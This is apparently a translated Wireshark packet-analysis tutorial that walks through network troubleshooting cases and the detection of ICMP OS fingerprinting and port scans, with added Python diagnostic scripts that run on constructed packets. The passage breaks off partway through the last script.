Phan Tich Goi Tin WIRESHARK (Packet Analysis with Wireshark)


  7/31/2019 Phan Tich Goi Tin WIRESHARK


    1. Some basic scenarios

    In this section we move on to concrete problems: using Wireshark and packet analysis to solve a specific network problem.

    We present a number of typical scenarios.

    A Lost TCP Connection

    One of the most common problems is a lost network connection. We will set aside why the connection was lost and look only at how it shows up at the packet level.

    Example:

    A file transfer that loses its connection:

    The capture starts with four TCP ACK packets sent from 10.3.71.7 to 10.3.30.1.

    Figure 3.1-1: This capture begins simply enough with a few ACK packets.

    The trouble starts at packet 5, where TCP retransmissions appear.

    Figure 3.1-2: These TCP retransmissions are a sign of a weak or dropped connection.

    By design, TCP sends a segment to the destination and, if no acknowledgement arrives within the retransmission timeout, resends the original segment. If there is still no response, the sender doubles the wait before the next retransmission (exponential backoff).


    As the figure shows, TCP retransmits five times; if five consecutive retransmissions get no response, the connection is treated as dead. On Windows that limit is the TcpMaxDataRetransmissions setting, whose default is 5.

    This is what it looks like in Wireshark, which labels the resends [TCP Retransmission] in the Info column:

    Figure 3.1-4: Windows will retransmit up to five times by default.

    Being able to pick out the retransmitted packets, and the point at which they stop, helps us work out where the connection was lost.
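    As an added example (not part of the original essay), the following Python script applies that retransmission logic to a constructed capture: it finds data segments sent more than once, checks that the gaps between resends double, and declares the connection dead once the retry limit of 5 is reached. The two addresses match the figure; the timestamps and the 1460-byte segment are assumptions.

```python
"""Spot TCP retransmissions and the exponential backoff that precedes a dead
connection.  Added example; the capture below is constructed, not the page's."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Segment:
    ts: float      # capture time in seconds
    src: str
    dst: str
    seq: int       # relative sequence number
    length: int    # TCP payload bytes
    flags: str     # e.g. "ACK", "PSH,ACK"


# Constructed capture modelled on Figure 3.1-2: four ACKs, then one data
# segment from 10.3.71.7 that is never acknowledged and is resent 5 times,
# the gap doubling each time (Windows-style RTO backoff).
CAPTURE = [
    Segment(0.000, "10.3.71.7", "10.3.30.1", 1, 0, "ACK"),
    Segment(0.010, "10.3.30.1", "10.3.71.7", 1, 0, "ACK"),
    Segment(0.020, "10.3.71.7", "10.3.30.1", 1, 0, "ACK"),
    Segment(0.030, "10.3.30.1", "10.3.71.7", 1, 0, "ACK"),
    Segment(0.040, "10.3.71.7", "10.3.30.1", 1, 1460, "PSH,ACK"),   # original send
    Segment(0.340, "10.3.71.7", "10.3.30.1", 1, 1460, "PSH,ACK"),   # after 0.3 s
    Segment(0.940, "10.3.71.7", "10.3.30.1", 1, 1460, "PSH,ACK"),   # after 0.6 s
    Segment(2.140, "10.3.71.7", "10.3.30.1", 1, 1460, "PSH,ACK"),   # after 1.2 s
    Segment(4.540, "10.3.71.7", "10.3.30.1", 1, 1460, "PSH,ACK"),   # after 2.4 s
    Segment(9.340, "10.3.71.7", "10.3.30.1", 1, 1460, "PSH,ACK"),   # after 4.8 s
]


def find_retransmissions(capture):
    """Return {(src, dst, seq): [timestamps]} for every data segment that was
    sent more than once.  Wireshark's [TCP Retransmission] heuristic is
    similar: same direction, same sequence number, payload already seen."""
    seen = {}
    for s in capture:
        if s.length == 0:
            continue   # pure ACKs carry no data and are never "retransmitted"
        seen.setdefault((s.src, s.dst, s.seq), []).append(s.ts)
    return {k: v for k, v in seen.items() if len(v) > 1}


def backoff_intervals(timestamps):
    """Gaps between successive sends of the same segment."""
    return [round(b - a, 3) for a, b in zip(timestamps, timestamps[1:])]


def is_exponential_backoff(intervals, tolerance=0.2):
    """True if each gap is roughly double the previous one."""
    return all(abs(b / a - 2.0) <= tolerance for a, b in zip(intervals, intervals[1:]))


def diagnose(capture, max_retries=5):
    """Flag flows whose unanswered segment hit the retry limit (Windows
    default TcpMaxDataRetransmissions = 5): those connections are dead."""
    report = []
    for (src, dst, seq), ts in find_retransmissions(capture).items():
        retries = len(ts) - 1
        gaps = backoff_intervals(ts)
        report.append({
            "flow": f"{src} -> {dst}", "seq": seq, "retries": retries,
            "gaps": gaps, "backoff": is_exponential_backoff(gaps),
            "dead": retries >= max_retries,
        })
    return report


if __name__ == "__main__":
    for r in diagnose(CAPTURE):
        print(r)
```

    Run it as a script to print one report entry per retransmitted segment; on a real capture, feed the same fields exported from Wireshark or tshark (time, addresses, tcp.seq, tcp.len, flags).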


    Unreachable Destinations and ICMP Codes

    One of the tools for checking network connectivity is ICMP ping. If you are lucky the target answers, which means the ping succeeded; if not, you get a message saying the host is unreachable. Capturing packets while you do this tells you far more than the plain ping output, because you see the ICMP error messages themselves.

    Figure 3.1-5: A standard ping request from 10.2.10.2 to 10.4.88.88

    The figure below shows the unreachable message that comes back for the ping to 10.4.88.88; it is sent by the device at 10.2.99.99.

    Unlike plain ping output, this tells us where the path breaks: the ICMP error originates at 10.2.99.99, the router that could not forward the packet. The message also carries an ICMP code that says why, here type 3 (Destination unreachable) code 1 (Host unreachable).


    Figure 3.1-6: This ICMP type 3 packet is not what we expected.

    Unreachable Port

    Another routine task is checking connectivity to a port on a server: whether the port is open and ready to accept incoming requests.

    For example, to check whether an FTP service is running on a server (FTP listens on TCP port 21 by default), we send a packet to port 21 on that host. If the host answers with an ICMP type 3 code 3 (Port unreachable) message, the port cannot be reached. Note that a closed TCP port normally answers with a TCP RST rather than with ICMP; the port-unreachable message is what you see for a closed UDP port, or when a firewall rejects the packet with ICMP instead of silently dropping it.
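    Added example, not from the original essay: a small Python decoder for ICMP Destination Unreachable messages. It builds two constructed packets, the host-unreachable reply from 10.2.99.99 of Figure 3.1-6 and a port-unreachable reply to a UDP probe of port 21, verifies the ICMP checksum, and extracts the rejected datagram's addresses and ports from the copy of the original header that ICMP carries. It also tags the Timestamp, Information and Address Mask request types that section 3 filters for. The source port 40000 and the inner header fields are assumptions.

```python
"""Decode ICMP Destination Unreachable (type 3) messages the way a capture
tool does, pulling out the code and the original datagram that was rejected.
Added example, not from the page; the sample packets are constructed."""
import socket
import struct

ICMP_TYPES = {0: "Echo reply", 3: "Destination unreachable", 8: "Echo request",
              11: "Time exceeded", 13: "Timestamp request", 14: "Timestamp reply",
              15: "Information request", 16: "Information reply",
              17: "Address mask request", 18: "Address mask reply"}
UNREACHABLE_CODES = {0: "Network unreachable", 1: "Host unreachable",
                     2: "Protocol unreachable", 3: "Port unreachable",
                     4: "Fragmentation needed and DF set",
                     13: "Communication administratively prohibited"}
RECON_TYPES = {13, 15, 17}   # the icmp.type==13 || 15 || 17 filter from section 3


def checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words; returns 0 when run over
    a packet whose checksum field is already correct."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src, dst, proto, payload_len):
    """Minimal 20-byte IPv4 header (no options); header checksum left 0."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0x1234, 0,
                       64, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))


def build_unreachable(code, orig_ip_header, orig_l4_prefix):
    """Type 3 message: 4-byte header + 4 unused bytes + offending IP header
    + first 8 bytes of its payload (enough for the transport ports)."""
    body = b"\x00" * 4 + orig_ip_header + orig_l4_prefix[:8]
    csum = checksum(struct.pack("!BBH", 3, code, 0) + body)
    return struct.pack("!BBH", 3, code, csum) + body


def decode_icmp(pkt):
    """Describe an ICMP message; for type 3 also say what the rejected
    datagram was (addresses, protocol, ports)."""
    icmp_type, code, _ = struct.unpack("!BBH", pkt[:4])
    out = {"type": icmp_type, "type_name": ICMP_TYPES.get(icmp_type, "other"),
           "code": code, "checksum_ok": checksum(pkt) == 0,
           "recon": icmp_type in RECON_TYPES}
    if icmp_type != 3:
        return out
    out["code_name"] = UNREACHABLE_CODES.get(code, "other")
    inner = pkt[8:]                         # copy of the original IP datagram
    ihl = (inner[0] & 0x0F) * 4
    proto = inner[9]
    out["orig_src"] = socket.inet_ntoa(inner[12:16])
    out["orig_dst"] = socket.inet_ntoa(inner[16:20])
    out["orig_proto"] = {1: "ICMP", 6: "TCP", 17: "UDP"}.get(proto, str(proto))
    if proto in (6, 17) and len(inner) >= ihl + 4:
        out["orig_sport"], out["orig_dport"] = struct.unpack("!HH", inner[ihl:ihl + 4])
    return out


# Constructed samples.  1) Figure 3.1-6: the router says 10.4.88.88 is
# unreachable (code 1) for an echo request sent by 10.2.10.2.
ECHO_PREFIX = struct.pack("!BBHHH", 8, 0, 0, 1, 1)
HOST_UNREACH = build_unreachable(
    1, build_ipv4_header("10.2.10.2", "10.4.88.88", 1, 40), ECHO_PREFIX)
# 2) The "Unreachable Port" case: a UDP probe to port 21 answered with code 3.
UDP_PREFIX = struct.pack("!HHHH", 40000, 21, 8, 0)
PORT_UNREACH = build_unreachable(
    3, build_ipv4_header("10.2.10.2", "10.4.88.88", 17, 8), UDP_PREFIX)
# 3) A timestamp request: not an error, but a fingerprinting probe.
_ts = struct.pack("!BBHHHIII", 13, 0, 0, 1, 1, 0, 0, 0)
TIMESTAMP_REQ = _ts[:2] + struct.pack("!H", checksum(_ts)) + _ts[4:]

if __name__ == "__main__":
    for p in (HOST_UNREACH, PORT_UNREACH, TIMESTAMP_REQ):
        print(decode_icmp(p))
```

    The embedded original header is the useful part: it tells you which of your own packets was rejected, so you can tie a type 3 message in a capture back to the probe (or the connection) that triggered it.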

    Fragmented Packets

    Figure 3.1-7: This ping request requires three packets rather than one because the data being transmitted is above average size.

    Here the captured packet is larger than the default 32 bytes of data that a Windows ping sends.

    The ping payload here is 3,072 bytes. Together with the 8-byte ICMP header that is more than the 1,500-byte Ethernet MTU can carry, so IP splits the datagram into three fragments.

    Determining Whether a Packet Is Fragmented

    In the IP header, the More Fragments (MF) flag is set on every fragment except the last, and the Fragment Offset field is non-zero on every fragment except the first. A packet with MF clear and an offset of 0 is not fragmented. Wireshark shows both fields under Internet Protocol > Flags, and puts the pieces back together when IPv4 reassembly is enabled in the protocol preferences.
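    Added example (not from the original page): a Python implementation of the MF/offset check, together with fragmentation and reassembly of a constructed 3,072-byte ping at a 1,500-byte MTU, which yields the three fragments of Figure 3.1-7. The IP header checksum is left at zero for simplicity; the addresses and the identification value are assumptions.

```python
"""Tell whether an IPv4 packet is a fragment, and reassemble a fragment set.
Added example; the fragments are constructed to match the page's 3,072-byte
ping (Figure 3.1-7) split at a 1,500-byte Ethernet MTU."""
import socket
import struct

MTU = 1500
IP_HDR = 20


def ipv4_header(src, dst, proto, ident, payload_len, mf=False, offset=0):
    """20-byte IPv4 header.  Flags/offset word: bit 14 = DF, bit 13 = MF,
    low 13 bits = offset in 8-byte units.  Checksum left zero (demo only)."""
    flags_off = (0x2000 if mf else 0) | (offset & 0x1FFF)
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, IP_HDR + payload_len, ident,
                       flags_off, 128, proto, 0,
                       socket.inet_aton(src), socket.inet_aton(dst))


def fragment_info(pkt):
    """Parse the flags/offset field.  A packet is a fragment if MF is set
    (more pieces follow) or its offset is non-zero (not the first piece)."""
    ident, flags_off = struct.unpack("!HH", pkt[4:8])
    mf = bool(flags_off & 0x2000)
    df = bool(flags_off & 0x4000)
    offset = (flags_off & 0x1FFF) * 8            # byte offset into the datagram
    return {"id": ident, "df": df, "mf": mf, "offset": offset,
            "fragmented": mf or offset > 0,
            "last": offset > 0 and not mf}


def fragment(src, dst, proto, ident, payload, mtu=MTU):
    """Split one datagram's payload the way an IP stack does: every fragment
    but the last carries a multiple of 8 bytes and has MF set."""
    chunk = (mtu - IP_HDR) // 8 * 8              # 1480 for Ethernet
    frags = []
    for off in range(0, len(payload), chunk):
        piece = payload[off:off + chunk]
        mf = off + len(piece) < len(payload)
        frags.append(ipv4_header(src, dst, proto, ident, len(piece), mf, off // 8) + piece)
    return frags


def reassemble(frags):
    """Stitch the fragments of one datagram back together, in any arrival
    order.  Returns None if a piece is missing (a hole) or the last fragment
    never arrived, which is how a reassembler notices loss."""
    pieces, total = {}, None
    for f in frags:
        info = fragment_info(f)
        data = f[IP_HDR:]
        pieces[info["offset"]] = data
        if not info["mf"]:
            total = info["offset"] + len(data)
    if total is None:
        return None
    out, pos = b"", 0
    while pos < total:
        if pos not in pieces:
            return None                           # hole: a fragment was lost
        out += pieces[pos]
        pos += len(pieces[pos])
    return out


# Constructed: an ICMP echo request carrying 3,072 data bytes (8-byte ICMP
# header + 3,072 = 3,080 bytes), versus the 32-byte default Windows ping.
BIG_PING = struct.pack("!BBHHH", 8, 0, 0, 1, 1) + bytes(range(256)) * 12
BIG_FRAGS = fragment("10.2.10.2", "10.4.88.88", 1, 0x4242, BIG_PING)
NORMAL_PING = (ipv4_header("10.2.10.2", "10.4.88.88", 1, 0x4243, 40)
               + struct.pack("!BBHHH", 8, 0, 0, 1, 2)
               + b"abcdefghijklmnopqrstuvwabcdefghi")

if __name__ == "__main__":
    for f in BIG_FRAGS:
        print(fragment_info(f), "bytes on wire:", len(f))
    print(fragment_info(NORMAL_PING))
```

    The three fragments carry 1,480, 1,480 and 120 bytes of the ICMP message; only the first one contains the ICMP header, which is why a filter on icmp alone will not match the later pieces unless reassembly is on.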

    No Connectivity

    Problem: two new employees, Hai and Thanh, sit next to each other and each has been given a computer. After both machines were set up and joined to the network, Hai's computer works and has normal network access, but Thanh's computer cannot reach the Internet.

    Goal: find out why Thanh's computer cannot reach the Internet and fix it.


    What we know

    Both machines are new, both have an IP address, and both can ping other hosts on the local network.

    In short, the two machines appear to be configured identically.

    Procedure

    Install Wireshark directly on both machines.

    Analysis

    On Hai's machine we first see a normal HTTP session. It begins with an ARP broadcast asking for the layer-2 (MAC) address of the gateway, here 192.168.0.10. Once Hai's machine has the reply, it completes a TCP handshake through the gateway and the HTTP session to the outside begins.

    Figure 3.1-12: His computer completes a handshake, and then HTTP data transfer begins.

    Thanh's computer

    Figure 3.1-13: Thanh's computer appears to be sending an ARP request to a different IP address.

    The ARP request above differs from Hai's: it asks for a gateway at 192.168.0.11 instead of 192.168.0.10.

    After that, NetBIOS traffic appears, which is itself a sign that something is wrong.


    NetBIOS broadcasts are what Windows falls back to when normal TCP/IP name resolution and routing fail. Seeing them here confirms that Thanh's machine cannot get out to the Internet over TCP/IP.

    ARP request details on the two machines:

    Hai's machine

    Thanh's machine


    Conclusion: Thanh's machine has the wrong default gateway (192.168.0.11) configured and so cannot reach the Internet; it must be set to 192.168.0.10, the same as Hai's.
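    Added example, not from the essay: Python that pairs ARP requests with replies in a constructed frame list, flags a host whose gateway lookup asks for the wrong address or never gets answered, and notes whether NetBIOS name queries followed. The host addresses 192.168.0.21 and .22, the external address and the frame timings are assumptions; only the two gateway addresses come from the page.

```python
"""Pair ARP requests with replies and flag hosts whose gateway lookup targets
the wrong address or never gets answered, the symptom on Thanh's machine.
Added example; the frames below are constructed."""
from collections import defaultdict

EXPECTED_GATEWAY = "192.168.0.10"      # the working gateway from the page

# Constructed frames: (time, protocol, sender_ip, fields).  For ARP the fields
# are (opcode, target_ip): opcode 1 = request (who-has), 2 = reply (is-at).
# Hai (192.168.0.21) asks for .10 and is answered; Thanh (192.168.0.22) asks
# for .11 three times, hears nothing, and falls back to NetBIOS name queries.
FRAMES = [
    (0.00, "ARP",  "192.168.0.21", (1, "192.168.0.10")),
    (0.00, "ARP",  "192.168.0.10", (2, "192.168.0.21")),
    (0.01, "TCP",  "192.168.0.21", ("SYN", "93.184.216.34:80")),
    (1.00, "ARP",  "192.168.0.22", (1, "192.168.0.11")),
    (2.00, "ARP",  "192.168.0.22", (1, "192.168.0.11")),
    (3.00, "ARP",  "192.168.0.22", (1, "192.168.0.11")),
    (3.50, "NBNS", "192.168.0.22", ("query", "WPAD")),
]


def arp_lookups(frames):
    """Count who-has requests per (asker, target) and note which pairs got an
    is-at reply from the target back to the asker."""
    asked = defaultdict(int)
    answered = set()
    for _, proto, sender, fields in frames:
        if proto != "ARP":
            continue
        opcode, target = fields
        if opcode == 1:
            asked[(sender, target)] += 1
        elif opcode == 2:
            answered.add((target, sender))   # in a reply, the target is the original asker
    return {pair: {"requests": n, "answered": pair in answered}
            for pair, n in asked.items()}


def diagnose_gateway(frames, expected_gateway=EXPECTED_GATEWAY):
    """Per (host, address asked for): is it the expected gateway, how many
    requests went unanswered, and did NetBIOS fallback traffic follow."""
    nbns_hosts = {sender for _, proto, sender, _ in frames if proto == "NBNS"}
    report = {}
    for (host, target), info in arp_lookups(frames).items():
        report[(host, target)] = {
            "wrong_gateway": target != expected_gateway,
            "unanswered_requests": 0 if info["answered"] else info["requests"],
            "netbios_fallback": host in nbns_hosts,
        }
    return report


def misconfigured_hosts(report):
    """Hosts that either asked for the wrong gateway or were never answered."""
    return sorted({host for (host, _), v in report.items()
                   if v["wrong_gateway"] or v["unanswered_requests"]})


if __name__ == "__main__":
    rep = diagnose_gateway(FRAMES)
    for key, val in rep.items():
        print(key, val)
    print("fix the gateway on:", misconfigured_hosts(rep))
```

    On a real capture the same three signals (ARP for an address nobody answers, no TCP handshake afterwards, NetBIOS broadcasts instead) point at a gateway or subnet misconfiguration before you ever open the host's network settings.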

    The Ghost in Internet Explorer

    Symptom: on A's computer, Internet Explorer keeps opening advertising pages on its own. When A resets the home page by hand the behaviour continues, and it survives a reboot.

    What we know

    A has not done anything to the machine. A's computer runs Windows XP with IE 6.

    Procedure

    Because the problem occurs only on A's machine, and the home page is changed whenever IE is opened, we capture the traffic from A's machine. We do not have to install Wireshark on A's machine itself; we can use the Hubbing Out technique (put a hub between A's machine and the switch and capture from a third machine plugged into the hub).

    Analysis


    Figure 3.1-16: Since there is no user interaction happening on A's computer at the time of this capture, all of these packets going across the wire should set off some alarms.

    Details of packet 5:

    Figure 3.1-17: Looking more closely at packet 5, we see it is trying to download data from the Internet.


    The computer sends an HTTP GET request to the address shown in the figure.

    Figure 3.1-18: A DNS query to the weatherbug.com domain gives a clue to the culprit.

    The reply packets start to look wrong: segments arrive out of order.

    Several of the following packets are duplicate ACKs.

    After that sequence there is a DNS query for deskwx.weatherbug.com.

    This is an address A does not know and never intended to visit.


    So some process is changing the home page each time IE starts. Checking the running processes with a tool such as Process Explorer shows a process named weatherbug.exe. After that process is killed the symptom no longer occurs.

    Processes like weatherbug are commonly adware or spyware.

    Process Explorer interface

    FTP Connection Failure

    Scenario: an FTP account on a Windows Server 2003 machine that has just been installed with its service packs. The FTP server software is running normally and the account is correct, but the client cannot connect.

    What we know

    FTP works on port 21

    Procedure

    Install Wireshark on both machines.

    Analysis


    Client:


    Figure 3.1-19: The client tries to establish connection with SYN packets but gets no response; then it sends a few more.

    The client sends SYN packets to start the handshake with the server but gets no reply from it.

    Server:


    Figure 3.1-20: The client and server trace files are almost identical.

    Because the server-side trace shows the same SYNs arriving, the packets do reach the server; they are dropped there rather than somewhere in the network. There are three possible causes:

    The FTP server is not running. Not the case: we confirmed it was running at the start.

    The server is overloaded or flooded with traffic and cannot answer. Also unlikely, since it was only just installed.

    Port 21 is blocked on the client, on the server, or on both. On inspection, the server blocks port 21 in both the Incoming and Outgoing directions in its Local Security Policy.


    Conclusion

    Sometimes a capture does not show the problem directly, but it rules out many possibilities and lets us make an accurate guess about what is wrong.

    -----------------------

    2. Handling network bandwidth problems

    Anatomy of a Slow Download

    Scenario: downloads across the whole network are very slow

    Procedure: place Wireshark where it sees all of the network's outbound traffic

    Analysis: the figure below shows a great many TCP and HTTP connections, which means many HTTP downloads are running and taking up the network's bandwidth.


    Figure 3.2-1: We need to filter out all of this HTTP and TCP traffic.

    Open Analyze > Expert Info to see more detail.


    Figure 3.2-2: The Expert Infos window shows us chats, warnings, errors, and notes.

    By default Expert Info shows everything. If we show only Error + Warn + Note we get the following.


    Figure 3.2-3: The Expert Infos window (sans chats) summarizes all of the problems with this download.

    The figure shows:

    many TCP connections opened by Windows Update, with TCP Previous segment lost events and duplicate ACKs on the transmitted segments

    and dropped packets, forcing TCP to retransmit.

    Together these two things consume the network's bandwidth and reduce download speed.

    Following this lead we get the information shown in the figures below.


    Figure 3.2-4: Previous segment lost packets indicate a problem.

    Figure 3.2-5: A fast retransmission is seen after a packet is dropped.


    Statistics > TCP Stream Graph > Round Trip Time Graph

    Figure 3.2-6: The round trip time graph for this capture

    The graphs confirm the diagnosis above. Downloads cannot proceed properly once the round-trip time exceeds 0.1 s; the ideal value in this capture is around 0.04 s.

    Conclusion: the slow downloads are caused by many Windows Update clients (machines set to auto-update) combined with packet loss. The Windows Update clients need to be turned off or rescheduled.
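    Added example (not from the original): Python that computes per-segment round-trip time from a constructed TCP stream by matching each data segment with the first ACK covering it, skips retransmitted segments (Karn's algorithm) because their ACK cannot be attributed to a single send, and flags samples above the 0.1 s threshold quoted above. The sequence numbers and timings are assumptions.

```python
"""Per-segment round-trip time from a TCP stream, the number behind
Wireshark's Statistics > TCP Stream Graph > Round Trip Time Graph.
Added example; the stream below is constructed."""

# (time, kind, seq, payload_len, ack): kind "data" is a server->client segment
# with relative sequence number seq; kind "ack" is the client's acknowledgement
# number.  Timings and sizes are assumptions.
STREAM = [
    (0.000, "data", 1,    1460, None),
    (0.040, "ack",  None, 0,    1461),   # acks segment 1          -> RTT 0.040
    (0.050, "data", 1461, 1460, None),
    (0.190, "ack",  None, 0,    2921),   # acks segment 1461       -> RTT 0.140
    (0.200, "data", 2921, 1460, None),
    (0.600, "data", 2921, 1460, None),   # retransmission of 2921
    (0.650, "ack",  None, 0,    4381),   # ambiguous: which send is it acking?
    (0.660, "data", 4381, 1460, None),
    (0.700, "ack",  None, 0,    5841),   # acks segment 4381       -> RTT 0.040
]


def rtt_samples(stream):
    """Match each data segment to the first ACK that covers it.  Karn's rule:
    a segment that was retransmitted yields no sample, because the ACK cannot
    be attributed to one particular transmission."""
    outstanding = {}       # seq -> [first send time, length, times sent]
    samples = []
    for ts, kind, seq, length, ack in stream:
        if kind == "data":
            if seq in outstanding:
                outstanding[seq][2] += 1
            else:
                outstanding[seq] = [ts, length, 1]
            continue
        for s in sorted(outstanding):
            t0, length, sends = outstanding[s]
            if s + length <= ack:                 # fully acknowledged
                if sends == 1:
                    samples.append((s, round(ts - t0, 3)))
                del outstanding[s]
    return samples


def summarize(samples, threshold=0.1):
    """Summary plus the segments whose RTT is over the threshold the page
    treats as too slow for a usable download."""
    rtts = [r for _, r in samples]
    return {"count": len(rtts), "min": min(rtts), "max": max(rtts),
            "mean": round(sum(rtts) / len(rtts), 3),
            "slow_segments": [s for s, r in samples if r > threshold]}


if __name__ == "__main__":
    samples = rtt_samples(STREAM)
    print(samples)
    print(summarize(samples))
```

    Wireshark's graph plots exactly these samples against sequence number; a cluster of points above 0.1 s in the middle of a transfer is the visual form of the "slow download" this section diagnoses, and the retransmitted segment shows up as a gap rather than a point.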

    Did That Server Flash Me?

    Scenario: Thanh complains that he cannot get into part of the Novell website to download some software he needs. Every time he visits the site the browser loads a little and then nothing more. Is there a network problem?

    What we know: a quick check shows that every other machine works normally; only Thanh's has the problem, so the issue lies with Thanh's machine.

    Procedure: install Wireshark and capture while visiting the Novell website from Thanh's machine


    Analysis:

    What we see as the HTTP connection to the Novell website starts:

    Figure 3.2-18: The capture begins with standard HTTP communication.

    The client then sends a RST packet to end the HTTP connection:


    Figure 3.2-19: Packets 28 and 29 present a problem.

    Why did the client send a RST? With one of Wireshark's more advanced features, Follow TCP Stream, we can see exactly what the Novell server returned in response to the HTTP GET.

    Figure 3.2-20: This Flash request is the source of our problem.

    It turns out the Flash content is opened in a pop-up window, which Thanh never sees. A check of the browser shows that its pop-up blocker is enabled.

    Conclusion: the browser is blocking pop-ups

    POP Goes the Email Server

    Scenario: mail is slow both within the domain and to other domains. A message takes 5-10 minutes to arrive after it is sent.

    What we know:


    The company runs its own mail server. The server uses the Post Office Protocol (POP) for receiving mail.

    Procedure:

    Capture packets on the mail server

    Analysis:

    POP protocol traffic as seen in Wireshark

    Figure 3.2-25: This capture includes a lot of POP packets.

    Figure 3.2-26: Changing the time display format gives us an idea of how much data we are receiving in what amount of time.

    Using Follow TCP Stream to view a message that has an attachment shows the following:


    Figure 3.2-27: The details of packet 1 show information about the email being sent.

    The attachment is padded with a long run of identical characters to inflate its size; checking further, there are a great many messages like this.

    We can conclude that the mail server is being spammed, which degrades its ability to serve legitimate requests, much like a denial-of-service attack.

    Remedy: find the source of the spam; a blacklist can be used to block the sending addresses.

    Conclusion: spam mail with large attachments
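    Added example (not the page's code): Python that wraps a constructed message the way a POP server returns it for RETR (RFC 1939 dot-stuffing and the terminating '.'), parses it back as an analyst would from the followed stream, and measures each attachment. The padded spam attachment (500,000 identical bytes) compresses to almost nothing, while a genuine one does not. The sender addresses, sizes, and the 100 KB / 1% thresholds are assumptions chosen for the demo.

```python
"""Pull attachments out of a POP RETR response and test whether they are
real data or padding: a file made of one repeated byte compresses to almost
nothing, the spam pattern the page found with Follow TCP Stream.
Added example; the messages are constructed."""
import random
import zlib
from email import message_from_bytes
from email.message import EmailMessage


def build_message(sender, subject, body, attachment, filename):
    """Constructed helper: a MIME message with one binary attachment."""
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = sender, "user@example.com", subject
    msg.set_content(body)
    msg.add_attachment(attachment, maintype="application",
                       subtype="octet-stream", filename=filename)
    return msg.as_bytes()


def pop_retr_response(raw):
    """Wrap a message as a POP server returns it for RETR: a +OK line,
    dot-stuffed lines, and a terminating line holding a single '.' (RFC 1939)."""
    lines = raw.replace(b"\r\n", b"\n").split(b"\n")
    stuffed = [(b"." + l if l.startswith(b".") else l) for l in lines]
    return b"+OK %d octets\r\n" % len(raw) + b"\r\n".join(stuffed) + b"\r\n.\r\n"


def parse_pop_retr(response):
    """Inverse of the above, what an analyst does on the captured stream:
    drop the status line, stop at the lone '.', and un-stuff leading dots."""
    status, _, body = response.partition(b"\r\n")
    if not status.startswith(b"+OK"):
        raise ValueError("RETR failed: " + status.decode(errors="replace"))
    lines = body.split(b"\r\n")
    if lines[-2:] != [b".", b""]:
        raise ValueError("response not terminated by CRLF.CRLF")
    return b"\r\n".join(l[1:] if l.startswith(b"..") else l for l in lines[:-2]) + b"\r\n"


def analyse_attachments(raw, min_size=100_000, max_ratio=0.01):
    """Size and zlib compression ratio of every attachment.  Real documents
    rarely shrink below a few percent; padding collapses to almost zero."""
    msg = message_from_bytes(raw)
    results = []
    for part in msg.walk():
        if part.get_content_disposition() != "attachment":
            continue
        data = part.get_payload(decode=True)
        ratio = len(zlib.compress(data)) / max(len(data), 1)
        results.append({"filename": part.get_filename(), "size": len(data),
                        "compressed_ratio": round(ratio, 4),
                        "padded": len(data) >= min_size and ratio < max_ratio})
    return {"from": msg["From"], "attachments": results}


# Constructed samples: a spam message padded with 500,000 identical bytes,
# and a genuine one carrying 120,000 bytes of seeded random data.
_rng = random.Random(7)
PADDED = build_message("spammer@example.net", "cheap offer", "hi",
                       b"A" * 500_000, "offer.doc")
GENUINE = build_message("alice@example.com", "Q3 report", "see attached",
                        bytes(_rng.getrandbits(8) for _ in range(120_000)), "report.bin")

if __name__ == "__main__":
    for sample in (PADDED, GENUINE):
        print(analyse_attachments(parse_pop_retr(pop_retr_response(sample))))
```

    Run over the messages pulled from a capture, the "from" field of every padded hit is the list of senders to feed into the blacklist the page suggests; the ratio test is what separates a padded attachment from a merely large one.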

    3. Some basic network security scenarios

    OS Fingerprinting


    OS fingerprinting is a common technique attackers use to gather information about a remote server, information that is useful for the next steps of an attack.

    Knowing the OS lets them identify likely vulnerabilities on the target and prepare the right tools for the attack.

    One of the techniques used is sending uncommon ICMP packets.

    Ordinary ICMP echo (ping) traffic raises no alarm, but Timestamp request/reply, Address Mask request and Information request are rarely seen in normal traffic.

    Figure 3.3-1: This is the kind of ICMP traffic you don't want to see.

    Sending such uncommon ICMP requests sometimes gets informative replies from the target.

    If the requests are answered, ICMP-based OS fingerprinting scans can be run against it.

    Handling: normal traffic almost never contains ICMP types 13, 15 and 17 (Timestamp, Information and Address Mask requests), so we can build a filter that catches them. The matching replies are types 14, 16 and 18; add them if you also want to see whether your hosts answer.

    Example: icmp.type==13 || icmp.type==15 || icmp.type==17

    A Simple Port Scan

    One of the fastest and most popular port scanners is nmap.

    The attacker's goal:


    find open ports and identify hidden tunnels

    We can detect a port scan by putting a listener on the host we want to protect and monitoring its traffic.

    Figure 3.3-2: A port scan shows multiple connection attempts on various ports.

    In the figure there are very suspicious connections between 10.100.25.14 (the local machine) and 10.100.18.12 (the remote computer).

    The log shows the remote computer sending packets to many different ports on the local machine, for example ports 21 and 1028.

    Notably, sensitive ports such as SSH (22), microsoft-ds (445), FTP (21) and SMTP (25) receive more packets than the others. These are ports with a high chance of compromise because of flaws in the applications behind them, and the packets may carry exploit code.
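    Added example serving both this section and the FTP failure in section 1 (not from the original): Python that classifies each bare SYN in a constructed packet list by what answered it (SYN,ACK = open, RST = closed, nothing = filtered), counts repeated SYNs to the same port, and flags any source that probed five or more ports on one host. The FTP addresses 10.0.0.5 and 10.0.0.9, the external web address and the port mix are assumptions; 10.100.18.12 and 10.100.25.14 come from the page.

```python
"""Classify TCP SYN attempts by what answered them, and flag sources that
probe many ports on one host.  Added example serving both the FTP failure
(section 1) and the port-scan (section 3) passages; packets are constructed."""
from collections import defaultdict

# (time, src, sport, dst, dport, flags)
PACKETS = [
    # FTP client 10.0.0.5 retries its SYN to the server's port 21; nothing comes back.
    (0.0, "10.0.0.5", 3021, "10.0.0.9", 21, "SYN"),
    (3.0, "10.0.0.5", 3021, "10.0.0.9", 21, "SYN"),
    (9.0, "10.0.0.5", 3021, "10.0.0.9", 21, "SYN"),
    # Remote 10.100.18.12 sweeps ports on 10.100.25.14: some open, some closed, one silent.
    (20.00, "10.100.18.12", 40001, "10.100.25.14", 21,    "SYN"),
    (20.00, "10.100.25.14", 21,    "10.100.18.12", 40001, "SYN,ACK"),
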